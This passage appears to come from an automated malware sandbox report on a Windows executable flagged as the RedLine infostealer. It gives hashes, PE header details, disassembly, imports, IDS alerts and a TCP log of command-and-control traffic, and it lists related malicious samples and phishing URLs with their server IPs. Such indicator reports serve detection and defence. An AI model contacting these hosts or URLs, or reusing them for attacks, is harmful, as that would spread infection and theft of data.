                                                                                                                                                                    reverse.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                                                                                                                    • 139.99.155.76
                                                                                                                                                                    reverse.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                                                                                                                    • 139.99.155.76
                                                                                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    • 51.210.170.199
                                                                                                                                                                    Settled Payment #Copy#U00ae .htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 51.77.64.70
                                                                                                                                                                    Payment Remittance Advice.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 51.77.64.70
                                                                                                                                                                    QR Code.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 158.69.18.246
                                                                                                                                                                    file_resized.exeGet hashmaliciousAmadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                    • 51.210.170.199
                                                                                                                                                                    QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                    • 51.91.236.255
                                                                                                                                                                    YrEtluOKPk.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    • 51.195.135.58
                                                                                                                                                                    https://rollins-mkt-prod1.campaign.adobe.com/rln/getImage.jssp?m=ebe0a673-b585-4d5f-8b02-173d6da0ca15&e=boss&l=brandlogo&i=https%3A%2F%2Fstn7ny.codesandbox.io?pop=someone.else%40somewhere.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 54.36.33.112
                                                                                                                                                                    https://269.bowwordon.live/fxddhqsm/?u=3w8p605&o=pn1kfzq&f=1&sid=t2~hckuzwxtbpsvmcpf30ztc331&fp=FvEsrkTArOgrxzhB2zExAA2IZuNTD8%2Fd9njv3jvDDOYnVROoSzmzg9nW12cfMdaHPT88q85r2inPkFCSbWgnzkfJFZZA3Mrzk%2F75MnETRxlcbvcR%2BeCurFnWMWd%2Fga7euAPm2FuOzEEhPFPKB9BvYYMpUxFP0z7K9pb7kfgbNf7SPRnAgQYfnloabfpuR%2BvXfyPOArMa%2B%2FuoZCunaXhl0et9vEushY7p%2FHvZJdO3bDfSLkShHDI5ukbNxghFhqsVSdcuoNPFbXVxUMFSYBPgTzlZOfrmXROiGBlvljFG6fsmagUS%2FcuqeVrqE60PwBTm3%2Fi07AuZFW5fp%2FVgaJ6PbiRsnFEiC40thM192GKHQmbP7RKplWwBB8%2B8V9R2MWg%2FLK44BnmLVLfMpK%2FaPUB4ZbPCt%2B1mkosN9tSoNyEbMODuLao0Z7nZzXzxHsVCzILD9XrGiz4%2BbS2yy4q2xExA%2FoVYHMdITtz12kRrUwM13QZcFjcbuNxO6UPZKT9ClRRrlg0lIkw74ioZ2xrB9aRabwONkY0LAtlodraoxsFw%2Frjld227l0ZlFzSfF7ItEflen4OWRtOFW9Wrsiz2kpJPf5oRAHrdZUkN3qG%2F15O3V44Vu5%2BpENw113oXAb%2B5jOBgRRW6I1X0bf8cLxhowerhiMxt50rO8mBdxAQdPHCn0gH0ebxDhuaS%2FLYgUGT1lau3HqE%2F1rCwqxjZHIo6t3aqvc2Hjj%2FENuGU9F8qLn%2F4HSsiaC3Sukth29CJ%2FIfm0DoG%2FPOpXcim37L%2BRGwafmRwN%2B34IPmlvf26KZfI8wQs9UXMmntP2FJP%2FEplJo%2FEuXUDDhLf4tdAg9dU6tbD8htpv%2FZ56%2BEYQ04G6xmNAeWyyYRYW%2BqH6QVG4vuesnwHsUFVE4r7Q4bD2AxRlxgBllMZb9xzCLFetaycJDSQe4RdWGHJtZe55ya806yBuHB3UEIOGCumNPnid8l%2BBkBxT47OXgjG0nQdZNEGlEbG8iU48EiFS%2BfynKs4mEnSwTUQwhNu%2BWoLCLWmr%2BaOWmLkzxkAF6DlCu5U4PEwv0kXLndfcSaUEdYFF1tSL6RjTjR%2F4%2FserlCJRcSC0A70S6zmMbbOJuTCTkFyZCbqppDwf3nbJIzemAl%2FNrhVTetxsOmVhtlYVIdWuIJsMR7pYLYn5O%2BJmmh84Qc78kaOcsh9IKStCc4s7wELskCRSZWlSlVcYTDe1y3u0Azm2jzKUoABLHZ9Gayot1pMs7Ezn44LtE0hIh6os5pialL6zko4EYcZwfFiJSo0zoKsO7C11hQRmWGjq9ZhzS17zVB68Uew11CRT2etioyLsWm0CulA60Qgl1Q3FhL2R0KGQ%2BVqJEQkT54SLGekGCD7A5m%2FAvJh2LOBlQo9XASyku5u4rhmSkHKP7PsYZvvAU38BIRQiJ%2FsNWG97AjUQfgHYLSFjuf9WfC6MGAL3akp5hbpczWPA5%2F0Kqh0QufsQ3FKt8oJHOgjavhW377FPwjPWPquNEQqJfXXFzbCLuu5Fo9dMm97xDMH9KJJNgJOg9VKpdhs0QZHZcHCZgzxR2RTrOotCmAA8xftgXFNd9%2BWk5tunEAteh6V5ByAox3YaUW4P%2FsPW2zAZ5eIXD7IFBnSN%2Bh1mwjkvV0iOw1pqDjahnAaTIBcM75Gcrjj5BZxbXdLsLKiEkjv30wyXvFmgAvISyDbT1JhfC7vxYw9wbQjxQte1G0Z0jdM3wY4NkW2GxS%2F0Yz5hdfDx8oVuW4axhzLyucNXmnWtXmSEilV7dOPCPAD%2BY%2B2Gb1jSwmVdZJy3ND9Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.36.116.88

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Igv6ymbAA3.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\Igv6ymbAA3.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2843
                                                                                                                                                                    Entropy (8bit):5.3371553026862095
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1Hl:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtx
                                                                                                                                                                    MD5:E9C2F4CC11CEA097B88D7D224F41A5B3
                                                                                                                                                                    SHA1:B16891C1E967E2803C1F994CA61ED82A52233C54
                                                                                                                                                                    SHA-256:843CF5780CF7C018F8431C1A69DB910BDC039E48C495A2C854A0C1A9C52CAF82
                                                                                                                                                                    SHA-512:2259C7E86AE80AC4CB26AB22FE50295D2C17E45BF31DF0BC3E91BCC9063300616764C1219E9B40A16EED0D2D63035B0EF1ED7B1BDBAEDF9408BF9D46E5A86D48
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.963681234872864
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:Igv6ymbAA3.exe
                                                                                                                                                                    File size:356864
                                                                                                                                                                    MD5:18ecf495a7e8dc91de0f57f60c9896f8
                                                                                                                                                                    SHA1:10a613527dc3d67c40957b9ee2eb8e0a4dd79fcc
                                                                                                                                                                    SHA256:f4e57d6160cc7f2ad503c3b1627cb5176ccc6e20490399b3700cdf7eeef8beec
                                                                                                                                                                    SHA512:51d57cb2d51bd314252da33b35d8c3d40b83f783a9bfd3475fe4d34d3472d497e8fd02c915d5ce687d33f4770ec26c609de06c64d1607198aa0bba8d0c7a01ab
                                                                                                                                                                    SSDEEP:6144:Ofr4CTYnMaqblzRhIVpCaTLymSB+1Va/dliK+jzTtim:U/TYM7bhRhmCaTRSKqdAPTtim
                                                                                                                                                                    TLSH:C0745B1382A13E96E9A64B769E1FD6E8761EF1708F597769321CFA1F08700B2D173B10
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L....?.b...........

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:454941454d55691d

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x404e59
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x62E73FCE [Mon Aug 1 02:51:58 2022 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    call 00007F4D3CD9DD53h
                                                                                                                                                                    jmp 00007F4D3CD993EDh
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                    je 00007F4D3CD99596h
                                                                                                                                                                    mov al, byte ptr [ecx]
                                                                                                                                                                    add ecx, 01h
                                                                                                                                                                    test al, al
                                                                                                                                                                    je 00007F4D3CD995C0h
                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                    jne 00007F4D3CD99561h
                                                                                                                                                                    add eax, 00000000h
                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                    mov eax, dword ptr [ecx]
                                                                                                                                                                    mov edx, 7EFEFEFFh
                                                                                                                                                                    add edx, eax
                                                                                                                                                                    xor eax, FFFFFFFFh
                                                                                                                                                                    xor eax, edx
                                                                                                                                                                    add ecx, 04h
                                                                                                                                                                    test eax, 81010100h
                                                                                                                                                                    je 00007F4D3CD9955Ah
                                                                                                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                                                                                                    test al, al
                                                                                                                                                                    je 00007F4D3CD995A4h
                                                                                                                                                                    test ah, ah
                                                                                                                                                                    je 00007F4D3CD99596h
                                                                                                                                                                    test eax, 00FF0000h
                                                                                                                                                                    je 00007F4D3CD99585h
                                                                                                                                                                    test eax, FF000000h
                                                                                                                                                                    je 00007F4D3CD99574h
                                                                                                                                                                    jmp 00007F4D3CD9953Fh
                                                                                                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    mov edi, edi
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                    push esi
                                                                                                                                                                    push edi
                                                                                                                                                                    push 00000008h
                                                                                                                                                                    pop ecx
                                                                                                                                                                    mov esi, 004012D8h
                                                                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                                                                    rep movsd
                                                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                    pop edi
                                                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                                                    pop esi

                                                                                                                                                                    Rich Headers

                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                    • [LNK] VS2008 build 21022

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x38ba80x64.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2800000x19398.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x29a0000xddc.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31500x40.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x3866a0x38800False0.8478723036504425data7.755781377893314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x3a0000x2458440x1e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x2800000x193980x19400False0.3788869121287129data4.259520200570937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x29a0000x33d80x3400False0.22611177884615385data2.5254465339166545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                    RT_ICON0x2807300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2815d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                                                                    RT_ICON0x281e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2844280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2854d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2859880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2868300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2870d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2876400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                                                                    RT_ICON0x289be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                                                                    RT_ICON0x28ac900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                                                                                                                                    RT_ICON0x28b6180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                                                                    RT_ICON0x28bae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                                                                    RT_ICON0x28c9900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                                                                    RT_ICON0x28d2380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0
                                                                                                                                                                    RT_ICON0x28d9000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                                                                    RT_ICON0x28de680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2904100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2914b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2919880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2928300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2930d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                                                                    RT_ICON0x2936400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                                                                    RT_ICON0x295be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                                                                    RT_ICON0x296c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                                                                                                                                    RT_ICON0x2976180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                                                                    RT_STRING0x297d200x664data
                                                                                                                                                                    RT_STRING0x2983880x59edata
                                                                                                                                                                    RT_STRING0x2989280x29adata
                                                                                                                                                                    RT_STRING0x298bc80x248data
                                                                                                                                                                    RT_STRING0x298e100x582data
                                                                                                                                                                    RT_GROUP_ICON0x297a800x68data
                                                                                                                                                                    RT_GROUP_ICON0x2859380x4cdata
                                                                                                                                                                    RT_GROUP_ICON0x2919200x68data
                                                                                                                                                                    RT_GROUP_ICON0x28ba800x68data
                                                                                                                                                                    RT_VERSION0x297ae80x238data

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    KERNEL32.dllGetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
                                                                                                                                                                    USER32.dllCharLowerBuffA
                                                                                                                                                                    GDI32.dllGetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
                                                                                                                                                                    ADVAPI32.dllMapGenericMask

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    192.168.2.351.210.170.19949701233682043233 05/28/23-10:33:05.871920TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init4970123368192.168.2.351.210.170.199
                                                                                                                                                                    192.168.2.351.210.170.19949701233682043231 05/28/23-10:33:20.355629TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4970123368192.168.2.351.210.170.199
                                                                                                                                                                    51.210.170.199192.168.2.323368497012043234 05/28/23-10:33:06.698130TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response233684970151.210.170.199192.168.2.3

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    May 28, 2023 10:33:05.533560991 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:05.562397003 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:05.566582918 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:05.871920109 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:05.902595997 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:05.949218988 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:06.668385029 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:06.698129892 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:06.746134996 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:14.263818979 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:14.297100067 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:14.297166109 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:14.297219992 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:14.297239065 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:14.340572119 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.257227898 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.288314104 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.434360981 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.589613914 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.617861032 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.634917974 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.663518906 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.677033901 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.707966089 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.729003906 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.757349014 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.811477900 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.839639902 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.843931913 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.872005939 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.873869896 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.901968002 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.951283932 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:15.978918076 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.979000092 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.979039907 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.979079008 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.979975939 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:15.987600088 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.015773058 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.128205061 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.156337976 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.158643961 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.186841011 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.246958971 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.414422035 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.441956997 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442012072 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442051888 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442087889 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442123890 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442158937 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442244053 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.442317009 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442323923 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.442359924 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.442436934 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442529917 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442540884 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.442781925 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.442909002 CEST4970123368192.168.2.351.210.170.199
